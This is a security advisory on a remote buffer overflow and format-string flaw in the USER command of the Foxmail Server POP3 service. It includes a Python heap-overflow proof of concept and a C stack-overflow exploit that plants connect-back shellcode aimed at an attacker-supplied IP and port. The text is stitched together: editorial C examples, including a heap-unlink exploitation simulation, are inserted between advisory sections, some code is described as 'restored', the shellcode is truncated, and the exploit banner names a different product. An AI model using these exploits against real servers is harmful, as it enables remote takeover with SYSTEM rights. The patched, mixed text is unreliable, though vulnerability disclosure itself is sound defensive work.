Category:   Application (E-mail Server)  >   Foxmail
Foxmail Server Buffer Overflow in USER Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1013356
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Mar 2 2005
Impact:   Denial of service via network, Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   Some vulnerabilities were reported in Foxmail Server. A remote user can execute arbitrary code on the target system.

The POP server does not properly validate user-supplied input in the 'USER' command. A remote user can supply a specially crafted USER command to trigger a buffer overflow and execute arbitrary code with System privileges.

A remote user can also send a USER command containing format string characters to cause the target service to crash.
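The two defects the description names, an unbounded copy of the USER argument and the argument reaching a formatting call as the format string, are shown below in the shape a POP3 handler typically has, beside a bounded version. This is an added editorial example, not Foxmail's code and not from the advisory; the 64-byte buffer, the function names, the log buffer and the sample lines are assumptions made for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define USER_MAX 64   /* assumed size of the server's username buffer */

enum user_result { USER_OK = 0, USER_BAD_SYNTAX = -1, USER_TOO_LONG = -2 };

static char g_log[256];   /* stand-in for the server's log line buffer (assumed) */

const char *last_log(void) { return g_log; }

/* The unsafe shape: unbounded copy of the argument into a fixed buffer, then
 * the attacker's string used as the format string. "USER " + 5000 'A' runs
 * past name[]; "USER %n%n" makes the log call write through whatever
 * pointers it pulls off the stack. Shown for contrast only; call it with
 * benign input. */
int handle_user_unsafe(const char *line)
{
    char name[USER_MAX];
    strcpy(name, line + 5);                 /* (1) no bound against sizeof name */
    snprintf(g_log, sizeof g_log, name);    /* (2) attacker data as the format */
    return USER_OK;
}

/* Case-insensitive match of the verb: RFC 1939 commands are case-insensitive,
 * and the exploit below sends "user". Stops at the first mismatch, so a short
 * line is never read past its terminator. */
static int is_user_verb(const char *line)
{
    const char *verb = "USER";
    for (int i = 0; i < 4; i++)
        if (toupper((unsigned char)line[i]) != verb[i])
            return 0;
    return line[4] == ' ';
}

/* Hardened handler: bounds the copy against the destination, rejects (rather
 * than silently truncates) an over-long argument, and only ever passes the
 * name as a %s argument. On USER_OK, out holds the NUL-terminated name. */
int handle_user_safe(const char *line, char *out, size_t outlen)
{
    if (!is_user_verb(line))
        return USER_BAD_SYNTAX;
    const char *arg = line + 5;
    size_t n = strcspn(arg, "\r\n");        /* the argument ends at CRLF */
    if (n == 0)
        return USER_BAD_SYNTAX;
    if (n >= outlen)                        /* leave room for the NUL */
        return USER_TOO_LONG;
    memcpy(out, arg, n);
    out[n] = '\0';
    snprintf(g_log, sizeof g_log, "USER %s", out);   /* name is data, never the format */
    return USER_OK;
}

/* Build "USER " + n*'A' + CRLF (constructed input, the same shape as the PoC
 * further down) and run it through the hardened handler. */
int check_long_user(size_t n)
{
    char name[USER_MAX];
    char *line = malloc(5 + n + 3);
    if (!line)
        return USER_BAD_SYNTAX;
    memcpy(line, "USER ", 5);
    memset(line + 5, 'A', n);
    memcpy(line + 5 + n, "\r\n", 3);        /* CRLF plus NUL */
    int r = handle_user_safe(line, name, sizeof name);
    free(line);
    return r;
}

int main(void)
{
    char name[USER_MAX];
    printf("USER alice  -> %d  log=\"%s\"\n",
           handle_user_safe("USER alice\r\n", name, sizeof name), last_log());
    printf("USER %%n%%n  -> %d  log=\"%s\"\n",
           handle_user_safe("USER %n%n\r\n", name, sizeof name), last_log());
    printf("5000 x 'A'  -> %d\n", check_long_user(5000));
    handle_user_unsafe("USER alice\r\n");    /* benign input only */
    return 0;
}
```

Rejecting an over-long name instead of truncating it matters beyond the overflow: a truncating copy would let two different 5000-byte names collapse to the same 63-byte prefix, which is a separate correctness problem in anything keyed on the username. The format-string fix is simply that user data is never the format; there is no need to filter `%` characters once that holds.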

xouyang of Fortinet, Inc. reported this vulnerability.

Impact:   A remote user can cause the target service to crash.

A remote user can execute arbitrary code on the target system with System privileges.

Solution:   No solution was available at the time of this entry.
Cause:   Boundary error, Input validation error, State error
Underlying OS:  Linux (Any), Windows (Any)
Underlying OS Comments:  Tested only on Windows

Message History:   None.

 Source Message Contents

Subject:  Foxmail server "USER" command Multiple remote buffer overflow

xouyang (Fortinet, Inc.)

    Foxmail Server is a mail server for both Windows and Linux.

    Affected: Foxmail Server for Windows version 2.0 (latest). I have only tested the Windows server; the Linux version may be vulnerable too.

    Foxmail, the e-mail client application, is the most famous software product in China. The Chinese version is sold to more than 3 million users and the English version to over 20 countries. It is listed as "Top Ten Domestic Software" and evaluated as "5 Star Software" by
    BODA's NT/Linux-based e-mail server system is featured by stability, security, ease of installation and maintenance, and rich functions. Different versions of the product can meet the varied needs ranging from small/medium-sized enterprises to ISPs/ICPs/ASPs.


    Vulnerabilities have been identified in Foxmail Server which can be exploited by malicious people to cause a DoS (Denial of Service) or possibly compromise a vulnerable server.

    The vulnerabilities are caused by boundary errors in the handling of the "USER" command in the POP server. A malicious person can exploit this by supplying a long, specially crafted argument to the vulnerable command, which will result in a buffer overflow.

    1. Heap overflow
    Sending a long username and receiving the reply causes a heap overflow. The crash site:
    00401BEA  |.  8902                mov     dword ptr ds:[edx], eax
    00401BEC  |.  8950 04             mov     dword ptr ds:[eax+4], edx

    EAX = 41414141
    EBX = 41414141

    Successful exploitation will allow remote execution of arbitrary code with SYSTEM privileges.

    2. Format string
    Sending a username like "%n%n" causes a DoS.

    3. Stack overflow
    Successful exploitation will allow remote execution of arbitrary code with SYSTEM privileges. Swan provides an exploit to test this bug.
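The two instructions at the crash site in item 1, with EAX under attacker control, have the shape of a doubly-linked-list unlink (`Blink->Flink = Flink; Flink->Blink = Blink`), which is what the Windows heap of that era performed on a chunk's free-list entry when the chunk was freed. The toy below reproduces that write pattern to show why a username overflow that reaches a neighbouring chunk's list links turns into a write-what-where. It is an added editorial example, not Foxmail's code and not the Windows allocator: the chunk layout, the 16-byte user-data size, the `g_dispatch` slot and the payload bytes are assumptions made for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct list_entry {
    struct list_entry *flink;   /* offset 0: written by  mov [edx],eax  (edx = Blink, eax = Flink) */
    struct list_entry *blink;   /* offset 4 on 32-bit: written by  mov [eax+4],edx */
} list_entry;

/* Assumed layout: the username is copied into data[], and the free-list
 * links of the next chunk sit directly behind it. */
typedef struct chunk {
    char       data[16];
    list_entry link;
} chunk;

/* The unlink the crash site performs. */
static void unlink_entry(list_entry *e)
{
    list_entry *f = e->flink, *b = e->blink;
    b->flink = f;     /* "what" (f) is written to "where" (b): the useful write */
    f->blink = b;     /* side effect: b is written at f + sizeof(void *)       */
}

/* A pointer the service later jumps through (think: a handler slot), typed as
 * list_entry * only so the toy involves no type-punning. */
static list_entry   *g_dispatch = NULL;
/* Bytes the attacker controls elsewhere in memory (stands in for shellcode). */
static unsigned char g_payload[32];

/* Returns 1 when the corrupted unlink has redirected g_dispatch to g_payload. */
int simulate_overflow(void)
{
    chunk         c;
    list_entry    head;
    unsigned char attacker[sizeof(chunk)];   /* constructed: the USER argument */

    /* Sane state: head <-> c.link, payload full of NOPs, slot unset. */
    head.flink = head.blink = &c.link;
    c.link.flink = c.link.blink = &head;
    memset(c.data, 0, sizeof c.data);
    memset(g_payload, 0x90, sizeof g_payload);
    g_dispatch = NULL;

    /* Attacker bytes: 16 bytes of filler, then Flink = "what", Blink = "where".
     * Because flink is at offset 0, pointing Blink at &g_dispatch makes
     * "Blink->Flink = Flink" store straight into the slot. */
    list_entry *what  = (list_entry *)g_payload;
    list_entry *where = (list_entry *)&g_dispatch;
    memset(attacker, 'A', 16);
    memcpy(attacker + offsetof(chunk, link) + offsetof(list_entry, flink), &what,  sizeof what);
    memcpy(attacker + offsetof(chunk, link) + offsetof(list_entry, blink), &where, sizeof where);

    /* The over-long copy runs past data[] over the links. A whole-struct copy
     * keeps the simulation well-defined instead of a real out-of-bounds write. */
    memcpy(&c, attacker, sizeof c);

    /* Later the chunk is freed and the allocator unlinks the corrupted entry. */
    unlink_entry(&c.link);

    return g_dispatch == (list_entry *)g_payload;
}

/* Offset inside the payload clobbered by the second write: the pointer-sized
 * slot right after the first. */
size_t clobbered_offset(void) { return offsetof(list_entry, blink); }

/* 1 if the payload bytes at clobbered_offset() now hold &g_dispatch. */
int payload_clobbered(void)
{
    list_entry *p;
    memcpy(&p, g_payload + clobbered_offset(), sizeof p);
    return p == (list_entry *)&g_dispatch;
}

int main(void)
{
    int redirected = simulate_overflow();
    printf("dispatch redirected to payload: %d\n", redirected);
    printf("payload bytes [%zu..%zu) overwritten by the second write: %d\n",
           clobbered_offset(), 2 * clobbered_offset(), payload_clobbered());
    return 0;
}
```

The second store is why the "what" address has to be writable and why heap shellcode of that period opened with a short jump: the bytes at what+4 (what+8 on 64-bit) are destroyed by the unlink itself. The later heap hardening ("safe unlinking", which checks `Flink->Blink == Blink->Flink == entry` before the writes) exists precisely to refuse this pattern.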

Foxmail PoC exploits:
1. Heap overflow
#Code by OYXin
# Ported to Python 3. The try: lines and the send() calls were missing from the
# archived copy and are restored from the description above; the default port
# of 110 (POP3) is an assumption.
import socket
import sys
import getopt


def usage():
    print("Usage: -h host -p port")


if __name__ == '__main__':
    host = None
    port = 110
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h:p:")
    except getopt.GetoptError as msg:
        print(msg)
        usage()
        sys.exit(1)
    for o, a in opts:
        if o in ["-h"]:
            host = a
        if o in ["-p"]:
            port = int(a)
    if host is None:
        usage()
        sys.exit(1)

    # 5000-byte USER argument: the heap overflow trigger
    evilbuf = b"USER " + b"A" * 5000 + b"\r\n"
    evilbuf2 = b"PASS oyxin\r\n"
    evilbuf2 += b"STAT\r\n"
    evilbuf2 += b"RSET\r\n"
    evilbuf2 += b"QUIT\r\n"
    try:
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((host, port))
        recvbuf = sockfd.recv(1024)   # greeting banner
        print(repr(recvbuf))
        sockfd.send(evilbuf)          # long username
        recvbuf = sockfd.recv(1024)   # reading the reply is where the overflow is triggered
        print(repr(recvbuf))
        sockfd.send(evilbuf2)
        sockfd.close()
    except socket.error as msg:
        print(msg)

2. Stack overflow
// Code by Swan
// Braces, the socket() call, the receive calls, the inter-byte delay and the
// line terminator were lost in the archived copy and are restored here so the
// file compiles. The shellcode beyond its first 16 bytes and the username
// filler beyond the first line of the literal are not on the page and are
// not reproduced.
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <conio.h>

#pragma comment (lib,"ws2_32")

// Byte offsets inside Shellcode where the connect-back port and IP are patched
#define PORT_OFFSET  118
#define IP_OFFSET    111

// Connect-back shellcode, XOR-encoded with key 0x99; these first 16 bytes are
// the decoder (jmp/pop to get the body address, xor byte [ebx+ecx],0x99 over
// 0x125 bytes). Only this first line survives in the archived advisory.
char Shellcode[] =	"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
					/* ... remainder missing from the archived copy ... */ ;

// Username line: the literal continued on the original page up to offset 244;
// main() pads the rest (assumed plain filler) before placing the stage.
char szUser[1024] =	"user 1231231231231234567890abcdefghijklmnopqrstuvwxyz1234567890a";
unsigned char szPass[] = "pass siglos\r\n";

void help(char *program)
{
	printf ("========================================================\r\n");
	printf ("Aerofox Mail Server POP3 Temp Dir Stack Overflow\r\n");
	printf ("========================================================\r\n\r\n");
	printf ("Usage: %s <Host> <Your IP> <Your port>\r\n", program);
	printf ("e.g.:\r\n");
	printf ("     %s 8111\r\n", program);
	printf ("\r\n  The ret address is 0x7ffa1571.\r\n");
}

SOCKET Connect(char *u_host ,unsigned short u_port)
{
	WSADATA wsaData;
	SOCKET sock;
	struct hostent *r;
	struct sockaddr_in r_addr;
	int timeout = 1000;

	if(WSAStartup(0x0101,&wsaData) != 0)
	{
		printf("error starting winsock..");
		return -1;
	}
	if((r=gethostbyname(u_host))== NULL)
		return -1 ;
	if((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET)
		return -1 ;
	r_addr.sin_family=AF_INET;
	r_addr.sin_port=htons(u_port);
	r_addr.sin_addr=*((struct in_addr*)r->h_addr);

	if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
	{
		printf("Can't connect\n");
		return -1;
	}
	setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
	return sock;
}

void Disconnect(SOCKET s)
{
	closesocket(s);
	WSACleanup();
}

// Drain one server reply (up to 1500 bytes or the receive timeout)
void tr(SOCKET s)
{
	char buff[1500];
	memset(buff, 0, sizeof(buff));
	recv(s, buff, sizeof(buff), 0);
}

// Send buf one byte at a time, pausing p milliseconds between bytes
void SlowSend(SOCKET s, char *buf, int p)
{
	//send(s, buf, sizeof(buf),0);
	//send(s, "\r\n", 2,0);
	for(unsigned int i = 0; i < strlen(buf); i++)
	{
		printf("%c", buf[i]);
		send(s, (char*)&(buf[i]), 1, 0);
		Sleep(p);	// delay inferred from the function name and the p argument
	}
}

void main(int argc, char *argv[])
{
	/* Disassembly of the 13-byte stage placed at szUser+252 below (the ret
	   after "push ebx" is the trailing 0xC3 in the byte string):
			mov		eax,90909091h
			dec		eax
		a:	dec		ebx
			cmp		[ebx], eax
			jnz		a
			push	ebx
	   It scans backwards from EBX for the 0x90909090 marker and returns into it. */
	if(argc != 4)
	{
		help(argv[0]);
		return;
	}

	unsigned short    port;
	unsigned long     ip;

	if(sizeof(Shellcode) - 1 < PORT_OFFSET + 2)
	{
		printf("Shellcode in this copy is truncated; the port/IP patch offsets lie outside it.\n");
		return;
	}
	port = htons(atoi(argv[3]))^(USHORT)0x9999;		// pre-XORed with the decoder key
	ip = inet_addr(argv[2])^(ULONG)0x99999999;
	memcpy(&Shellcode[PORT_OFFSET], &port, 2);
	memcpy(&Shellcode[IP_OFFSET], &ip, 4);

	SOCKET s = Connect(argv[1], 110);
	if(s == INVALID_SOCKET)
		return;
	tr(s);		// greeting banner

	memset(szUser + strlen(szUser), 'a', 244 - strlen(szUser));	// filler up to the overwrite point
	memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);	// int3, nop, jmp +4, ret address 0x7ffa1571
	memcpy(szUser + 244 + 8,  "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\xC3\x90\x90\x90\x90", 17);	// stage + 0x90909090 marker
	memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);
	memcpy(szUser + 244 + 8 + 17 + sizeof(Shellcode) - 1, "\r\n", 3);	// end of the USER line

	SlowSend(s, (char*)szUser, 1);
	tr(s);
	SlowSend(s, (char*)szPass, 100);
	tr(s);
	Disconnect(s);
}

    Thanks to Swan for providing his cool exploit.

